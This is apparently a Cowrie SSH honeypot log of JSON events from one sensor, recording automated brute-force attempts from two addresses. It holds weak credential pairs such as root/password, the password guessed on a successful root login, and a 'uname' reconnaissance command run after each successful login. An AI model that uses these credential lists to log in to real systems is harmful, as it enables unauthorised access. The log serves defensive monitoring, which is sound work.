{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:28:28.732473Z","src_ip":"217.154.1.158","session":"6d2dddbc8fcf"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:28:28.776649Z","src_ip":"217.154.1.158","session":"6d2dddbc8fcf"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:28:29.793146Z","src_ip":"217.154.1.158","session":"6d2dddbc8fcf"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39338,"dst_ip":"1.2.3.4","dst_port":22,"session":"2814a07d3157","protocol":"ssh","message":"New connection: 217.154.1.158:39338 (1.2.3.4:22) [session: 2814a07d3157]","sensor":"my-vps","timestamp":"2025-08-26T19:28:46.183180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:28:46.184086Z","src_ip":"217.154.1.158","session":"2814a07d3157"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:28:46.198609Z","src_ip":"217.154.1.158","session":"2814a07d3157"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:28:46.243828Z","src_ip":"217.154.1.158","session":"2814a07d3157"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:28:46.331788Z","src_ip":"217.154.1.158","session":"2814a07d3157"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:28:46.332493Z","src_ip":"217.154.1.158","session":"2814a07d3157"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:28:46.348301Z","src_ip":"217.154.1.158","session":"2814a07d3157"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:28:46.349394Z","src_ip":"217.154.1.158","session":"2814a07d3157"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59296,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c60c4166461","protocol":"ssh","message":"New connection: 217.154.1.158:59296 (1.2.3.4:22) [session: 3c60c4166461]","sensor":"my-vps","timestamp":"2025-08-26T19:29:03.708650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:29:03.709321Z","src_ip":"217.154.1.158","session":"3c60c4166461"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:29:03.723851Z","src_ip":"217.154.1.158","session":"3c60c4166461"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-26T19:29:03.769610Z","src_ip":"217.154.1.158","session":"3c60c4166461"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:29:04.799014Z","src_ip":"217.154.1.158","session":"3c60c4166461"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56654,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d3846d8c086","protocol":"ssh","message":"New connection: 217.154.1.158:56654 (1.2.3.4:22) [session: 5d3846d8c086]","sensor":"my-vps","timestamp":"2025-08-26T19:29:21.275306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:29:21.276406Z","src_ip":"217.154.1.158","session":"5d3846d8c086"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:29:21.290615Z","src_ip":"217.154.1.158","session":"5d3846d8c086"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-26T19:29:21.398344Z","src_ip":"217.154.1.158","session":"5d3846d8c086"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:29:22.422106Z","src_ip":"217.154.1.158","session":"5d3846d8c086"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33772,"dst_ip":"1.2.3.4","dst_port":22,"session":"50763a3bae30","protocol":"ssh","message":"New connection: 217.154.1.158:33772 (1.2.3.4:22) [session: 50763a3bae30]","sensor":"my-vps","timestamp":"2025-08-26T19:29:39.934911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:29:39.935889Z","src_ip":"217.154.1.158","session":"50763a3bae30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:29:39.951067Z","src_ip":"217.154.1.158","session":"50763a3bae30"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:29:39.995376Z","src_ip":"217.154.1.158","session":"50763a3bae30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:29:40.044023Z","src_ip":"217.154.1.158","session":"50763a3bae30"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:29:40.044718Z","src_ip":"217.154.1.158","session":"50763a3bae30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:29:40.059862Z","src_ip":"217.154.1.158","session":"50763a3bae30"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:29:40.060949Z","src_ip":"217.154.1.158","session":"50763a3bae30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42587,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d1f43d96e76","protocol":"ssh","message":"New connection: 212.227.235.229:42587 (1.2.3.4:22) [session: 6d1f43d96e76]","sensor":"my-vps","timestamp":"2025-08-26T19:29:42.087948Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:29:42.377011Z","src_ip":"212.227.235.229","session":"6d1f43d96e76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50201,"dst_ip":"1.2.3.4","dst_port":22,"session":"792112f08a8e","protocol":"ssh","message":"New connection: 212.227.235.229:50201 (1.2.3.4:22) [session: 792112f08a8e]","sensor":"my-vps","timestamp":"2025-08-26T19:29:42.527501Z"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:29:52.935051Z","src_ip":"212.227.235.229","session":"792112f08a8e"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43472,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d92098c7a1d","protocol":"ssh","message":"New connection: 217.154.1.158:43472 (1.2.3.4:22) [session: 7d92098c7a1d]","sensor":"my-vps","timestamp":"2025-08-26T19:29:56.459430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:29:56.460278Z","src_ip":"217.154.1.158","session":"7d92098c7a1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:29:56.475090Z","src_ip":"217.154.1.158","session":"7d92098c7a1d"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:29:56.518655Z","src_ip":"217.154.1.158","session":"7d92098c7a1d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:29:57.535229Z","src_ip":"217.154.1.158","session":"7d92098c7a1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58625,"dst_ip":"1.2.3.4","dst_port":22,"session":"33a3bd8f8ea3","protocol":"ssh","message":"New connection: 212.227.235.229:58625 (1.2.3.4:22) [session: 33a3bd8f8ea3]","sensor":"my-vps","timestamp":"2025-08-26T19:30:07.440334Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0003\u0001\\xa8\u0001\u0000\u0001\\xa4\u0003\u0003s\\xf0Z\\xc0\u001c\\xb0\u001b\\xee'\\xcd\\xf0\\x9d\\x8b\\xee\u00120\\x81\\xff\u001b\\xb4\u0010h;\",j=)\\xee4\\x8d` \\xd8\\xc3:\\x8a\\xad\u0005\\xbdo\u001f \\xaf \\xfeWb\\xdd\u0007\\xb0\\xe9s-\\x9b\\xbf'mM\\xa78\\xa7\\xb2\\xe1$\u0000\\x8a\u0000\u0016\u00003\u0000g\\xc0\\x9e\\xc0\\xa2\u0000\\x9e\u00009\u0000k\\xc0\\x9f\\xc0\\xa3\u0000\\x9f\u0000E\u0000\\xbe\u0000\\x88\u0000\\xc4\u0000\\x9a\\xc0\b\\xc0\t\\xc0#\\xc0\\xac\\xc0\\xae\\xc0+\\xc0","message":"Remote SSH version: \u0016\u0003\u0003\u0001\\xa8\u0001\u0000\u0001\\xa4\u0003\u0003s\\xf0Z\\xc0\u001c\\xb0\u001b\\xee'\\xcd\\xf0\\x9d\\x8b\\xee\u00120\\x81\\xff\u001b\\xb4\u0010h;\",j=)\\xee4\\x8d` \\xd8\\xc3:\\x8a\\xad\u0005\\xbdo\u001f \\xaf \\xfeWb\\xdd\u0007\\xb0\\xe9s-\\x9b\\xbf'mM\\xa78\\xa7\\xb2\\xe1$\u0000\\x8a\u0000\u0016\u00003\u0000g\\xc0\\x9e\\xc0\\xa2\u0000\\x9e\u00009\u0000k\\xc0\\x9f\\xc0\\xa3\u0000\\x9f\u0000E\u0000\\xbe\u0000\\x88\u0000\\xc4\u0000\\x9a\\xc0\b\\xc0\t\\xc0#\\xc0\\xac\\xc0\\xae\\xc0+\\xc0","sensor":"my-vps","timestamp":"2025-08-26T19:30:07.441604Z","src_ip":"212.227.235.229","session":"33a3bd8f8ea3"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:07.444037Z","src_ip":"212.227.235.229","session":"33a3bd8f8ea3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54621,"dst_ip":"1.2.3.4","dst_port":22,"session":"29d2de7a926b","protocol":"ssh","message":"New connection: 212.227.235.229:54621 (1.2.3.4:22) [session: 29d2de7a926b]","sensor":"my-vps","timestamp":"2025-08-26T19:30:07.747548Z"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:10.754231Z","src_ip":"212.227.235.229","session":"29d2de7a926b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":46356,"dst_ip":"1.2.3.4","dst_port":22,"session":"91fd497d66e7","protocol":"ssh","message":"New connection: 217.154.1.158:46356 (1.2.3.4:22) [session: 91fd497d66e7]","sensor":"my-vps","timestamp":"2025-08-26T19:30:14.276587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:30:14.277562Z","src_ip":"217.154.1.158","session":"91fd497d66e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:30:14.295793Z","src_ip":"217.154.1.158","session":"91fd497d66e7"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:30:14.340144Z","src_ip":"217.154.1.158","session":"91fd497d66e7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:15.356614Z","src_ip":"217.154.1.158","session":"91fd497d66e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63420,"dst_ip":"1.2.3.4","dst_port":22,"session":"174fdfe1a81f","protocol":"ssh","message":"New connection: 212.227.235.229:63420 (1.2.3.4:22) [session: 174fdfe1a81f]","sensor":"my-vps","timestamp":"2025-08-26T19:30:20.054353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:30:20.055146Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:30:20.185808Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
{"eventid":"cowrie.login.failed","username":"user","password":"polo","message":"login attempt [user/polo] failed","sensor":"my-vps","timestamp":"2025-08-26T19:30:20.809361Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
{"eventid":"cowrie.login.failed","username":"user","password":"oblivion","message":"login attempt [user/oblivion] failed","sensor":"my-vps","timestamp":"2025-08-26T19:30:21.941988Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
{"eventid":"cowrie.login.failed","username":"user","password":"mustangs","message":"login attempt [user/mustangs] failed","sensor":"my-vps","timestamp":"2025-08-26T19:30:23.080117Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
{"eventid":"cowrie.login.failed","username":"user","password":"margarita","message":"login attempt [user/margarita] failed","sensor":"my-vps","timestamp":"2025-08-26T19:30:24.219213Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
{"eventid":"cowrie.login.failed","username":"user","password":"letsgo","message":"login attempt [user/letsgo] failed","sensor":"my-vps","timestamp":"2025-08-26T19:30:25.352113Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
